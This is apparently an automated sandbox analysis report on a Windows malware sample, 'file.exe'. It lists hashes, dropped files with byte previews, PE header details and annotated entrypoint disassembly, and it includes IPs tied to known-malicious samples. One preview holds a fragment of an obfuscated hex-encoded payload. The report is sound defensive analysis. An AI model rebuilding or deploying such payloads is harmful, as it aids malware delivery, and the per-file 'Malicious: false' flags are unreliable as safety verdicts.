                                                                                                                                                                                                                                                    armv5l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                                    • 1.8.230.191
                                                                                                                                                                                                                                                    BJQizQ6sqT.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                                    • 172.67.150.173
No context
No context
Process: C:\Windows\System32\WerFault.exe
File Type: Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 65536
Entropy (8bit): 2.2887650031916205
Encrypted: false
SSDEEP: 384:1BC1Lsxe0jAWMnvKIRvKnASzuiFNY4lO8k:1B8sxe0j0niavYASzuiFNY4lO8
MD5: 1A6CA009C597CAE833FB61FEC4929E55
SHA1: 3F94C1178FCA0749C255737840339AFE00D817DE
SHA-256: 5615692E2D5E655E5B3B1C8E43B04D2328F24F4B66351A45EF9B62C0F0B8D6E0
SHA-512: EC5D6A8A08E421B5D4ABCC1C54AD9B4A34355DFF2930D7209577DBBD52EFC89825857AE94A9B8B988D9FEDC777A36DD6CCAC345672EC787E4707DE203BB9014A
Malicious: false
Reputation: low
                                                                                                                                                                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.4.3.2.3.1.8.9.9.9.1.2.9.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.F.l.a.g.s.=.5.2.4.2.8.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.5.0.8.0.f.2.5.-.a.8.5.5.-.4.b.8.0.-.9.b.7.b.-.8.4.9.5.a.f.6.2.d.5.a.2.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.5.1.4.1.f.3.1.-.a.a.a.b.-.4.7.9.2.-.8.1.0.b.-.3.6.f.6.9.c.e.1.1.f.d.3.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.E.x.p.l.o.r.e.r...E.X.E.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.E.X.P.L.O.R.E.R...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.1.4.-.0.0.0.1.-.0.0.1.4.-.d.9.c.f.-.1.9.4.b.3.1.5.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.9.0.b.0.8.0.e.0.6.5.5.7.2.0.c.a.d.8.c.1.c.a.e.4.b.8.1.9.3.c.9.3.8.2.c.9.a.c.9.2.!.e.x.p.l.o.r.e.r...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.0.2././.1.2././.2.1.:.2.0.:.5.
Process: C:\Windows\System32\WerFault.exe
File Type: Mini DuMP crash report, 17 streams, Mon Dec 23 12:58:39 2024, 0x1205a4 type
Category: dropped
Size (bytes): 1020712
Entropy (8bit): 1.3745202200022035
Encrypted: false
SSDEEP: 1536:7Z9jnXAsfXsEUStY0ZX8t+HfBYY516P0y69z1iUrtn0G777kLww:N9jXAsPsEUStYgXtHfBYepy6drh0Ew
MD5: 70389A43492376F9DB9CEFB29E424DE4
SHA1: 825931D1A8C3E772D1624015DD3846A06A970431
SHA-256: 8F2D9AD486D4673B55F6C884909F272B8594D449EA8BFBF27F87B3D72282549E
SHA-512: 989478F6F2853514F9FA99C0F472C9762179A9B19D0D06C7F66C785D1326EC6BED3BF4E1F301EFD275F50C7888804F5644194EC2259ABAB77A0F93404CCE8935
Malicious: false
Process: C:\Windows\System32\WerFault.exe
File Type: XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category: dropped
Size (bytes): 10858
Entropy (8bit): 3.702949030517078
Encrypted: false
SSDEEP: 192:R6l7wVeJdAxmX6YXfIgmfqzV0asprQ89bmKvZVfYbCm:R6lXJagX6YPIgmfqzVimSZVf4
MD5: B7BCBB78A69EB940B609EC8CE517D890
SHA1: 6C2DAB85B5BB571F53B5B56866E1C9A98E00B8E2
SHA-256: 641A7152F85FA4CA6F3AB172C8DFBAAB4D5DBB13F90B84398BE083298A1855A1
SHA-512: 1E26D1EF1D080DEFFFF6E7D91D98BA45FCC7A11F0CA68D8DAAD0E417D42AD2B2F921A63DA08CC788D794A75ABEC462EE8187D09944D3550B45AD76627AB39ECF
Malicious: false
                                                                                                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.5.8.0.<./.P.i.
Process: C:\Windows\System32\WerFault.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 4724
Entropy (8bit): 4.463507363479176
Encrypted: false
SSDEEP: 48:cvIwWl8zsnRJg771I9JeWpW8VYfYm8M4JYmFkJyq85ckb9Q3jd:uIjfnjI7ef7VLJGqba3jd
MD5: D46C2BADB4AEA6AEE373E0D4FD547C0F
SHA1: 6B7C70A4BF1E341025AE1E60F22F0DE677910BC1
SHA-256: 0727B48959E52ED489D7F5A2C3AC40FB81B725A6D9212923EAA3E7495C1E4D9C
SHA-512: EC89E22E51AB64DCAC72006730241BE826F23AE9887CCA57929EA4C2C1F997ADCEE68A27511AF4890D4FE88A32E29EFD9959E1F5D0E3CCACAF62B9291EAE8A78
Malicious: false
                                                                                                                                                                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="643921" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):108216
                                                                                                                                                                                                                                                    Entropy (8bit):4.005560478368003
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:b7F9oInjxkCGnzOP2jk0+ACWHpfnzbNyLYduJxP7pxoZsR1v9nvnFOOmdypfR3YG:hdkrzPrJvzgxhGiwGGnS5mFwiKuiTl+a
                                                                                                                                                                                                                                                    MD5:33B5E965E4CA22B8D1AFCCCECF721C32
                                                                                                                                                                                                                                                    SHA1:F09FD036B58CD7B1EE8E9A52C0F494791D4F6E08
                                                                                                                                                                                                                                                    SHA-256:07F7452B78D7CD7FCA4E69D9E2349D811682B1EB4C88D1588CE4ED38C5600607
                                                                                                                                                                                                                                                    SHA-512:AAD4C259D40E1A95115D23F7EACA8471B2B9ED8E5B57108E702194F178B4CF2C383F61666F3C259FCD58F883AAE03343F9AF6180449597428FD4162A699CB4E5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:....h... .......p.......P...........p...Y......^...................P...W.......e.n.-.C.H.;.e.n.-.G.B...............8..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................. ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s
                                                                                                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):108216
                                                                                                                                                                                                                                                    Entropy (8bit):4.006735880796696
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:d5F9omnjxk6G7zOP2jk0+ACWHpfnz/NmLYduJxP7pxoZsR1v933nFOOmdypfR3Yg:LdkfzPrJvzEZhGiwGGnOlmFYiKeiZl+a
                                                                                                                                                                                                                                                    MD5:74BA5B1B12DAEDC78FF365562E6D0974
                                                                                                                                                                                                                                                    SHA1:9E266E7A6F7887C7F912CC8B01915D65708A12DC
                                                                                                                                                                                                                                                    SHA-256:9ED23444E82B05AC511DF50EFEDB33E095A19CE8DF6F14523AB2045AC9101C7F
                                                                                                                                                                                                                                                    SHA-512:0021B6AD3552EB61C643DE28007D40750D387D76C646C0D8E6B884092718657C18BA7DC2AB63E3B2ECA501446560B668BFB7F15D05B985419BA4D9E827DFED73
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:....h... .......p.......P...........p...Y......^...................P...W.......e.n.-.C.H.;.e.n.-.G.B...............8..............P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....V.1...........Roaming.@............................................R.o.a.m.i.n.g.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....`.1...........Start Menu..F............................................S.t.a.r.t. .M.e.n.u.................. ..........P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....P.1...........user.<............................................j.o.n.e.s
                                                                                                                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):891
                                                                                                                                                                                                                                                    Entropy (8bit):5.191505485958786
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:Yzc2ZGtHeG40BBkC3c2SjrkHt0drc6hE1opM:YzDmJBzDqrgt0drcAEMM
                                                                                                                                                                                                                                                    MD5:8A21CD8990999FC54A3D650ED5D014D2
                                                                                                                                                                                                                                                    SHA1:45E7C18284CB592FA14C3597111797A40C7B9AB8
                                                                                                                                                                                                                                                    SHA-256:9B7B9BFB8C86502BE7B1BA572D9E71FC00935F1BF87FDB0B910170A5707B92C4
                                                                                                                                                                                                                                                    SHA-512:25EF8E95C96886C04FAA2F1216C79F7E42E827CB7205B85931BC17F0E16D4F174C5FC7BF6AB1B851EBDE111A93018040559D2A1FE2BBDEAB7794FE25B3A6F84C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:{"serviceContext":{"serviceActivityId":"cb18b741-9087-4e9f-a291-b14e61e8ec32","responseCreationDateTime":"0001-01-01T00:00:00","debugId":"cb18b741-9087-4e9f-a291-b14e61e8ec32|2024-12-23T12:58:48.0498204Z|fabric_msn|EUS2-A|News_438","tier":"\u0000","clientActivityId":"09FA015E-7B4F-4ED8-A5D2-064DB861FB0A"},"expirationDateTime":"0001-01-01T00:00:00","showBadge":false,"settings":{"refreshIntervalMinutes":0,"feedEnabled":true,"evolvedNotificationLifecycleEnabled":false,"showBadgeOnRotationsForEvolvedNotificationLifecycle":false,"webView2Enabled":false,"webView2EnabledV1":false,"windowsSuppressClientRace":false,"flyoutV2EndpointEnabled":false,"showAnimation":false,"useTallerFlyoutSize":false,"useDynamicHeight":false,"useWiderFlyoutSize":false,"reclaimEnabled":false,"isPreviewDurationsEnabled":false,"1SlockscreenContentEnabled":true,"setMUIDOnMultipleDomains":false},"isPartial":false}
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):15034
                                                                                                                                                                                                                                                    Entropy (8bit):7.578012176929356
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:M9/RcKo4RzResR5s3e4w2+yCYneynsTMjSg/MOhRApRk0OU:MRcTaEsHs3e4iysTMjUb
                                                                                                                                                                                                                                                    MD5:6508A0C17354946EC6B1531459A7B45E
                                                                                                                                                                                                                                                    SHA1:A409C6B7820B73507B58F06BDFAED09B5F48CB23
                                                                                                                                                                                                                                                    SHA-256:EEEBDCF2015381FB304A474F24DBAAB537980E3F2C1F244CB8730E35FC47A130
                                                                                                                                                                                                                                                    SHA-512:B0A315F3A99BC5A1045E461DC4B4BC9504F722E00817407B84CACE3F1939AA50D70218E09D9B4B1B87FBF27311DE5223B3D40085BADF357DB31739899FE85AFA
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:EA06.....Zo.........SP.n......5e...`.....|....T...3...(.6&.....9vp.=...G.....7@..9......$..k...........c}V.....?.P...p...Y@Q?.{..'..c.D.&.N. .'.9e.D.&`...D..' ...D...s...D...S.(......sP...h...M.Q?.y..G.c.D....Q.......O......60..........vh...0.7..!.....)^...t.C........$..C......l>[......!....|.0...&d.....Hz..a....l?..uo.....P......V0....j......|......l.....A.?.. Bg.8.l.E..Ed.L...?.. Bg.....Y..>@.............@..'.....8|.?..u.........l. O..]e...O..!e...& ....#s.......3.Y....9.......9..M.7?............l?...F..........C7....g .........x2..8.a...?..j..+4.....W?..j....Y..M. ?.0....Q...d}S0{.......M.".@...Z........V....n.....Q>...'.N...r..(.-........0W.........(....... 6..p.....6zh......?.....O8....lCN....i..?..8}@L..E.i.....61...f#q....>.N....4..M.Q?.q.........D..0N..V.A..M.>K0i..d.h.&...%.Y...|.*..<..aw.].3c..H.@B?...G..1...' ....k|.A.O..#.....}V`....#..H|.P!..d....0z....Y..>K..G.*/....G.7c.H..b....W..1....?.01..b.!...@.?..o.F|....p9......S.!..nb.!....zb0..
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):183050
                                                                                                                                                                                                                                                    Entropy (8bit):7.979901482148886
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3072:MgpM7LsljYUvkvbY5+7zLtGgaddUPcogD2PXgw07/LGT/RJBPwbjFQdYM55EezN2:MgkLsx5vk85+7nsgaddoldPQNERwbjmG
                                                                                                                                                                                                                                                    MD5:4C24081CA4AE444F1B41B855AD6687BD
                                                                                                                                                                                                                                                    SHA1:59782AD6913C7BF6767B254AA602B7DE6ECA52CC
                                                                                                                                                                                                                                                    SHA-256:218BDCC63D5BC0224C54AEAE6F964806FBAAE64E45865D2E46F3A7D8E4F612A9
                                                                                                                                                                                                                                                    SHA-512:058422237C246FC243BED6F3C16A28C4603ED5C8704136070B432BAA96731A2DC0A9D1A560EB8456148FA1AE4DC3B33CF4D92226FE2999458F63393CFB7D1CD6
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:EA06.....Bc...RmS.Zy...s...\{.z.c...Mk{..z.I..j..mN.S.......'...]....?.{.q.S#...6E]..s...C(.[fs...q'..*7J$.A...m18... .L..z<...L...o..$........'......HeQoT>....$..TZo.._..oL"I0..%1.h......j.R.T..Td.cZ.b.X.Vk4.5X..v.]2.W.._.I......h...>.W.Vi`.4.R....S...91L..z..*.S..{.I.N......W..'..X.....L.yj.....@*..oZj..._...'..........................n..ZW#'#.C.4..........Z.e.}..R.....m....p......V._+..,zy..Pk.z..;].l..Y.So...5<F.[.P..z.#A...k.M.z....$..fh...Y.....S..{.N.J...P.1)...\.^h.-E~7_.OkU..[.D.m.[.u8.1..6Z.EN...W..-'._T.gx...3q_..h.,..OH.a.4Nh..V.b...gr.[..8..[M@.Ek].P.YP....s.'..w{-e^....:..`..\..h..^.%..T...$.%...t=.>......#.....7Y|....W.....T..^./\.........{.S......lu..6.#...39-.6.......n...dv........;.|..s...j<X.c...B3[.F...a.......z.......o.."....{u.4...n..Y.b.=..8.-.f?..F.....W.....e..Q..;..V.a@...;...A.Gu...O...o.<..bs...t0.}o.....Z+.....Q7.-.KKj.l.....kK..z.Y.....q..|t..5...-L......=M.#...w!.\_r.`.av..<C...t...?b.{........Y.U..z.f.Uy?Z&.=.
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):172054
                                                                                                                                                                                                                                                    Entropy (8bit):3.181772124901705
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:sb3feqfCpfS6ftqfA0f9fWf9fZ1fi20fq0fFfY6fofi51fK0fi0fCfZ1fK0f70fB:iaNS3Hx7LIaDf/QDXz68rCkup3c3klX
                                                                                                                                                                                                                                                    MD5:58120F04CD4576726BCAD5950AD62E93
                                                                                                                                                                                                                                                    SHA1:B831F6C0235ECAB1DB66F3DD5650C1E7A9DF7684
                                                                                                                                                                                                                                                    SHA-256:238DB99B9E4EDEEC50FF211B02FAEA0590981B4E5B034E4C462569A52DDB83F7
                                                                                                                                                                                                                                                    SHA-512:B1F568CECB8869819F2A2984A331F812078B72DD93D4A9B0C1AC18470E4E0AC3D6C41594D10751F70A53D8A0BB7F0348FCA7DEDEBD6B3DD5E17E473EF1FB8F9A
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:hixjs0hixjsxhixjs5hixjs5hixjs8hixjsbhixjsehixjschixjs8hixjs1hixjsehixjschixjschixjschixjs0hixjs2hixjs0hixjs0hixjs0hixjs0hixjs5hixjs6hixjs5hixjs7hixjsbhixjs8hixjs6hixjsbhixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjs5hixjs8hixjs4hixjsbhixjs9hixjs6hixjs5hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjsdhixjs8hixjs6hixjsbhixjsahixjs7hixjs2hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs5hixjs5hixjs8hixjs8hixjsbhixjs8hixjs6hixjsehixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjs5hixjs8hixjsahixjsbhixjs9hixjs6hixjs5hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjsdhixjs8hixjschixjsbhixjsahixjs6hixjschixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs5hixjs5hixjs8hixjsehixjsbhixjs8hixjs3hixjs3hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjs5hixjs9hixjs0hixjsbhixjs9hixjs3hixjs2hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjsdhixj
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                    File Type:ARC archive data, squashed
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):189440
                                                                                                                                                                                                                                                    Entropy (8bit):7.8426916173774925
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3072:sjG41+Wkzp39nxwPo1N9qKcuxW+NNJCSu2o2PVAutLnyeFibWq6mgKJQtBq76:si4Ubzp3gP+qKxWMiSu2tBdnVw1PEo76
                                                                                                                                                                                                                                                    MD5:CAA0BD96580ABD511C795B895AC50341
                                                                                                                                                                                                                                                    SHA1:3971AFD488781EA21B604A9BD2E2B1CFF094A6E6
                                                                                                                                                                                                                                                    SHA-256:BA3C130FBBECD0DEA2C5135538764F48F82F1BA8381BD82A7CA604FE4534AFFC
                                                                                                                                                                                                                                                    SHA-512:4769801AEBD2271886F5E65503B282B07BF4F45A290BE7A94A0268E046BC3DFF980B2CA679E09CA4D52E0A74A852DC777D9036E4ED3CA935F0121F5C327926AF
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Preview:.....T6SNi.@..q.WP...|5[...SIWMPZMSWSYJ4T6SN1NSIWMPZMSWSY.4T6]Q.@S.^.q.L..r."]'.#<^)!(:m3;#=8'y(QtD& .'=i...z <36wG9^.SN1NSIW>Ao.d'..}D..d>j..O..!*...U...$m..7...'...$0?d)..T6SN1NSI..PZ.RVS=...6SN1NSIW.PXLXVYYJ.V6SN1NSIWM`.LSWCYJ4.4SN1.SIGMPZOSWVYK4T6SN4NRIWMPZM.USYH4T6SN1LS..MPJMSGSYJ4D6S^1NSIWM@ZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWc$?5'WSY..V6S^1NS.UMPJMSWSYJ4T6SN1NSiWM0ZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NSIWMPZMSWSYJ4T6SN1NS
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.703836411064381
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: file.exe
File size: 1'482'240 bytes
MD5: b96e6785937bd52b1281fb98f0abcf25
SHA1: d27572ada589769bfdb99dabbd485556e39010ba
SHA256: 519678c24f6036d935bdd915090f07ad1fea068dc2491861648c6b00698de514
SHA512: 39aadf908dcbb16588e5a93f7c633224d3ba7aa3bed54ae96e3fb9320fc080b6da7987b8d66d279266045b1aaafc1788b47bb72558ff42371acd55e8f768304d
SSDEEP: 24576:Gtb20pkaCqT5TBWgNQ7aMhKG+mrh1JPUc9g56A:zVg5tQ7aMhKG+mrPVD9k5
TLSH: 9665CF1223EDCFA5C77143337EA4B7526E7F7D25A571F6472F842A2CB930A24412A523
                                                                                                                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........
Icon Hash: 17394d716d69338e
Entrypoint: 0x425f74
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x676915E0 [Mon Dec 23 07:48:48 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 5
OS Version Minor: 1
File Version Major: 5
File Version Minor: 1
Subsystem Version Major: 5
Subsystem Version Minor: 1
Import Hash: 3d95adbf13bbe79dc24dccb401c12091
Note: the DLL Characteristics list carries DYNAMIC_BASE (ASLR) and TERMINAL_SERVER_AWARE but not NX_COMPAT, the image is unsigned, and the OS/subsystem version of 5.1 means the header still declares Windows XP compatibility. The timestamp decodes correctly (0x676915E0 = 1734940128 = 2024-12-23 07:48:48 UTC) and lies immediately before the analysis, so it does not look forged.
Instructions at entrypoint (0x425f74, .text):
call 00007FAD248A32CFh
jmp 00007FAD248962E4h
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FAD2489646Ah
cmp edi, eax
jc 00007FAD248967CEh
bt dword ptr [004C0158h], 01h
jnc 00007FAD24896469h
rep movsb
jmp 00007FAD2489677Ch
cmp ecx, 00000080h
jc 00007FAD24896634h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FAD24896470h
bt dword ptr [004BA370h], 01h
jc 00007FAD24896940h
bt dword ptr [004C0158h], 00000000h
jnc 00007FAD2489660Dh
test edi, 00000003h
jne 00007FAD2489661Eh
test esi, 00000003h
jne 00007FAD248965FDh
bt edi, 02h
jnc 00007FAD2489646Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FAD24896473h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FAD248964C5h
bt esi, 03h
jnc 00007FAD24896518h
movdqa xmm1, dqword ptr [esi+00h]
Reading note: only the first two instructions belong to the entry function. The call-then-jmp pair is the standard MSVC CRT entry stub (initialise the security cookie, then jump into the CRT startup routine); everything after the two int3 padding bytes is the next function in .text, a CRT memcpy implementation (overlap check, rep movsb fast path gated on a feature flag at 004C0158h, then SSE movq/movdqa copy loops), not the sample's own logic. The 00007FAD... branch targets are relative to the base the sandbox used when disassembling, not to the file's image base of 0x400000; the absolute memory operands (004C0158h, 004BA370h) do fall inside the .data section (0x4ba000 to 0x4c3d54).
Programming Language:
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2012 UPD4 build 61030
• [RES] VS2012 UPD4 build 61030
• [LNK] VS2012 UPD4 build 61030
Data directories (Name | Virtual Address | Virtual Size | Is in Section)
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0      | 0x0     |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0xb7004  | 0x17c   | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0xc4000  | 0xa0de0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0x0      | 0x0     |
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0      | 0x0     |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0x165000 | 0x6c4c  | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x8d8d0  | 0x1c    | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0      | 0x0     |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0      | 0x0     |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x0      | 0x0     |
